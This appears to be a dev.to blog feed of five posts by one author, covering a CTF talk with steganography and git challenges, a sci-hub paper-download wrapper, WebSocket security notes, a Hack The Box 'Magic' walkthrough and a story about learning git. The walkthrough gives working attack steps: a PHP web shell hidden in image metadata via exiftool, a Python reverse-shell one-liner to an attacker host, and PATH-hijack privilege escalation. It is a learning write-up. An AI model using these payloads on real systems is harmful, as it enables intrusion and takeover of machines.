Forem: Kumar Ashwin

Hacking is not black and white!

Kumar Ashwin — Tue, 08 Sep 2020 19:49:49 +0000

This is related to a talk given by me and pre & post-event activities, that were conducted at Developer Circles, Pune and Bengaluru.

It all started with DEFCON 2020 Red Team Village CTF, my team and I reached the Top 50 and it was just amazing for all of us. It was an enriching experience, solving challenges from a wide range of categories and learning new stuff in the process. One section of the CTF dealt with Malware Analysis and I was fascinated by this domain of security and have been learning about it.

So, after a few days, when the excitement settled I was talking to the lead of Developer Circles: Pune's and she asked me if I could take an introductory session on Hacking and Capture the Flag events.

We wanted it to be a learning experience for the people who were interested in security and wanted to start with something. For this, I came up with an idea to have a small pre-event CTF challenge in which the attendees will have to find the name of the speaker.

"Stegosaurus ate my homework!"

We announced the event with this poster as it's face, this looked different and weird, hence grabbed the attention of people. We crafted a small story around it and posted in the community groups - DevC Pune and Bengaluru.

It was a Steganography challenge and focused on new folks interested in security and CTF. It was supposed to be the first CTF challenge for many people trying, so the pressure was high to make it fun and engaging while keeping it simple and easy.

What is Steganography?

The practice of concealing messages or information within other non-secret text or data, so that the actual data is disguised.

So, coming back to the challenge, the main things that I wanted to focus on was the amount of attention on the details, paid by the participants and obviously steganography.

The poster had lots of hash and gibberish on it. So, basically the challenge involved downloading the image and try to figure out the speaker's details. Upon downloading, the name of the image also looks like the following, ZGV2Y3t0aGlzX2lzX3lvdXJfcGFzc3dvcmR9.jpg - it looks like some kind of encoded string.

They had to take that file name and search for the type of encoding that was done. For that, my goto is Cyber Chef and upon checking it gives that the following string is base64 encoded.

The decoded text is the standard way a flag is represented in a jeopardy style CTF. So that complete text is the flag, which suggests it is the password (but for what?). Few people got stuck with just the text inside the curly brackets but that was not the case, we have to try all the permutations to see what works for us.

Reading the challenge description we find that there was a creature that was mentioned - stegosaurus. Upon a bit of google searching, we find that it is related to steganography.

So, there are other ways to get to know if the image is a steganography image or not, there are tools like binwalk that will tell us that there is something else that we have in the file which suggests steganography.

We have the password and we have an image, now we have to find out tools using which we can extract the data. We can use CLI tools like steghide to obtain the required information but we can also use online hosted tools like Steganographic Decoder.

Upon submitting the form, we get the details of the speaker!

The Talk!

Received over 600 views and 130 comments followed by many interesting questions and discussions with amazing community members of Developer Circles, Pune and Bengaluru, this was a success, I am grateful that people found that they had something to take back from my talk.

Did you git it?

Seeing the response, of the previous challenge, Sangeeta asked me to bring in one more challenge as people tend to learn a lot from it.

So, I worked out a small challenge, where the objective was to find the flag. As it was a beginner challenge, I kept open several doors and made it super easy to get into.

So, basically the challenge was to download an archived repository which included an executable and using that we had to find out the flag.

The first step was to identify how the application works, and upon using the application for a while, it was evident that it encodes the text in ROT47 and decodes it. There was an admin account and that looked juicy.

Using all the information they had, they needed to find the flag. There are several ways to do this by using hex editors, decompilers, etc. but for beginners, they might look a bit intimidating, so there are ways that can be easy to achieve the desired task.

The repo that has been presented to them, contains a .git directory resembling a git repo. Which means we can treat it as a git repo and run git commands to see what we have.

git status showed me that there are few files that looked interesting. They are removed but not committed, we can leverage this to retrieve these files.

Several things can be done, like git diff to see the changes made in these files which give us enough information to crack open the challenge. But the thing I like doing is

git checkout .

And we have an encoded string in creds.txt, which can be decoded by the same tool and can act as the password for the admin account, hence giving the flag.

It was a long post! 😅 Hoooh!

But the experience was amazing ❤️ Looking forward to giving more talks and organising events like these. Especially, I want to thank Facebook Developer Circles, Pune and Sangeeta. She is just so welcoming of new ideas and even supports in implementing those. I learned a lot during the session as well, the kind of engagement she was able to create amongst the audience and the amount of quality questions that came up was really impressive.

Thanks all!

sci-hub.tw wrapper - desearch

Kumar Ashwin — Wed, 22 Jul 2020 20:10:02 +0000

Going through the internet in search of research papers for the literature review, I found this cool website - sci-hub.tw, and it provides free research papers published on IEEE, ACM, etc and instantly fell in love with this place, and the only reason for that is, it promotes the idea of "knowledge for all" ❤️

Hat's off to Alexandra Elbakyan, Kudos!!

The content is awesome, but the user experience was not that great for me. I had to download a lot (~20) of research papers and the process was pretty hectic. And I think myself as fortunate enough that I know to program and developed this sci-hub.tw wrapper - desearch.

The code was initially written in Bash but then I shifted to Golang. I did a bit of research in observing the pattern and developed this which can be used via command line to download multiple research papers at a time.

How I used it,

for url in `cat urls.txt`
do
desearch $url; 
done

Check out the project here!

I would love to get feedback on the same and I hope this helps others too!

Knowledge for all!!

Web Sockets Everywhere!

Kumar Ashwin — Sun, 28 Jun 2020 15:56:50 +0000

We have been dominated by web sockets. Yes, the time has come, technology is dominating us. Wait, what web socket is initiated over HTTP! 😂

Two days ago, I was reading about Ajax, I stumbled upon the term web sockets, and just like any other ignorant being, the show must go on 😆 Two days later, I decided to start with the Portswigger labs and scrolling to choose a random topic and yet again web sockets came in my way. The universe was giving me signs and this time, I took it and today morning started to learn a bit about Web Sockets (let's call it WS instead of Web Sockets).

And god, it took my day, there is a lot to know about it, and this article is me sharing my day with you.

First Line that caught my attention was it is initiated over HTTP and the security guy inside of me started throwing question.

What are Web Sockets???

Upgrade for HTTP, like literally.
When you need full-duplex (Server&Client talking to each other - bidirectional) connections.
Native Web socket support is in JavaScript, though it supports other clients as well.
Two protocols could be useful for establishing web sockets connections - ws - web socket and wss - web socket secure (that's what I think that acronym is 😆)
Examples: chatting applications, web-based games, and anything that requires real-time connections.

How is it an upgrade for HTTP?

HTTP send headers along with each request, which increases the latency, thus making it slower in comparison whereas WS don't, they send header once and then keep the connection on till required, and yeah you guessed it right a lot faster than AJAX.

We have been talking a lot about HTTP and WS header what differences are there, so to understand I opened up Slack and decided to go to the developer tools section!

This is what I got!!! 😧

Response Header

HTTP/1.1 101 Switching Protocols
upgrade: websocket
connection: Upgrade
sec-websocket-accept: oj8LcmKK/eSwbxqeLkHKwJx3TvQ=
sec-websocket-extensions: xxx

The response header contains several hints that suggest WS are being used, 101 Switching Protocols, Upgrade and Connection suggests upgrade in connection protocols.

Request Header

Host: wss-primary.slack.com
User-Agent: xxx
Sec-WebSocket-Version: 13
Origin: https://app.slack.com
Sec-WebSocket-Extensions: xxx
Sec-WebSocket-Key: 1N5BmOgjVY1OcHvXPvrBhQ==
Connection: keep-alive, Upgrade
Cookie: xxx
Upgrade: websocket

Similarly in request headers, Sec-WebSocket-Version is present as well as Connection and Upgrade suggests upgrade in protocols.

All being said, Not everything is rainbows & unicorns.

Everything wrong with Web Sockets!

Never trust user input, I can't emphasize it enough. Properly crafted malicious inputs can lead to SQL Injection XXE Injection on the client's side.
If the WS connection is not secure enough then the malicious actor can transmit data to other users.
No default authentication method. It takes data forwarded from HTTP, like cookies, etc and can thus lead to Cross-Site Web Socket Hijacking. Therefore, a separate mechanism for authentication is required for the transmission of sensitive data.
The main concern that comes out of WS are as they arise from HTTP, "any web security vulnerability that arises with regular HTTP can also arise about Web Sockets communications"
WS Needs special configurations for load balancing.
Ummm, etc...

Web Sockets are a tool which if used properly, can be a real gift, and if not, may God be with you!

This was my day, summed up in an article 😂 I hope you learned something from it! Check out the references for more in-depth information!

References

Peace Out!

Learning the CTF way! : 1/n

Kumar Ashwin — Sat, 30 May 2020 21:55:29 +0000

This CTF Learn Series, will be tips and tricks I learned during CTFs.

So, that being said, today I pwned my first Hack The Box machine - Magic!

Thanks to Fahmi's Magic Walkthrough!

So, I was presented with a webserver with 2 ports in use. Started to do recon on the website and found a login panel - bypassed the login using simple SQL injection.

An image upload interface greeted me, and is ready to accept png, jpg and gif formats ONLY. There was a chance to get access using a php-reverse-shell but no, it did not accept any .php format or even I tried .php.png, bad luck! This was the time for me to learn this first trick

How to implement reverse shell inside an image?

Using this tool - exiftool - we can view the metadata of an image and we could use the same to alter it as well.

exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']);?>' image.png

What this command does is, it alters the Comment parameter of the image.

As we have used, $_GET we could send the data through the url in cmd parameter ...image.php.png?cmd=<any shell command> and this will run the shell commands and give the output in the browser.

Checked if python is available or not, it was not but python3 was!

Then used the python one liner reverse shell to get access to the shell. Passed the one liner through cmd parameter and started listening on some port nc -nlvp 1234.

Python One Liner Reverse Shell:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Did a bit recon as www-data, found credentials of mysql database which lead to mysqldump of user's credentials.

Next step was privilege escalation to root!

Ran linpeas.sh and found out some SUID binaries, and one specific that looked interesting was sysinfo which was linked to lshw.
Time for the next lesson!

How to escalate using PATH variable and SUID?

After doing some recon, we knew that when sysinfo was running a service called lshw and therefore if we could run same command before sysinfo, we could possibly achieve our task.

Created a new file in /tmp/cardinal/lshw and put that python reverse shell in it and made it executable.

What we have to do now, is that specify this location in the PATH variable.

export PATH=/tmp/cardinal/:$PATH

And then we came to our terminal and started the reverse shell and then in the user's terminal executed sysinfo.

Viola!

Pretty Little Secret - From Seeker to Speaker

Kumar Ashwin — Thu, 14 May 2020 13:24:46 +0000

A year and a half ago, freshman year of college. New people, new journey and I was that excited little kid, who wanted to learn and know everything. Being super curious never left me xD. The start was not something crazy but normal. It took some time for me to mingle with people, get to know folks who seem to be playing a really important role in my life.

I never knew hack-a-thons were my thing, I didn’t know they even existed. Yeah, I was living under a rock, called Netflix and Chill. I along with my few friends volunteered for an event in the college, which was to be followed by a hack-a-thon. If not for one of my teachers, I would have left just after the event ended and never took part in hack-a-thon. Eventually, I ended up developing a simple message encryption tool and felt super awesome about it. It was not that great but it meant something to me.

Time passed and events like these became my honey pots. It's just, I like developing. I didn't bother to put my work out there, I like to develop things and it used to make me happy. But someday it had to end and the day came and it became necessary for me to put my work out there to take part in an event, and it was required for the selection process. So, one of my senior suggested to look up about Github.

I was like, what’s that? I knew this is something that’s used for collaboration, and that’s it. That was git for me, just some theory, and I never planned to learn that, as I thought I would never use it. But that was the day I got exposed to git, somehow managed to upload my work and then I forgot about it.

It took some motivation, embarrassment, and some humiliation, for me to learn Git and start working on it and was addicted to it since then.

When I started, I worked in projects with people who used to use Git, but I just looked for a way around. For me, it worked for a pretty long time, and people used to think that I know about it and have worked on it and I too have never denied it. But then came a project, this was the website for Google Developers Group, Pune. It was an open-source project, and I was so excited that I was going to collaborate with like minded people. Poor me, I was unaware of what’s in store for me. So, I was assigned some work by one of the moderators and I started working and it took a couple of days to complete. Then the problem occurred during uploading the files to the git repository in the development branch and pull some changes that others have made to move forward with the project. I tried everything, at least I thought that, but nothing seemed to happen. I was stuck.

This time, I couldn’t find my way around. At this moment, I felt, I did not belong here. I reached till this place but shouldn’t have been. I experienced imposter syndrome. But the work had to be done, so then I asked the moderator for help as I couldn’t find a way to do it. He was super awesome and kind, helped me and asked me to brush up some skills to work with git and sent me some learning materials.

I was thankful to him but at the same time, I was super embarrassed. At this point, I decided to learn git and have been using it since then.

Couple of weeks ago, I was allowed to talk about git and it’s workflow at an online workshop, conducted by SICSR ACM Student Chapter. I felt really good about doing something I never thought of, and couldn’t believe that this is the same guy from one and a half years ago.

Everyday you learn and everyday you grow. Don’t let anything stop you, not even your own self!

That's the event poster!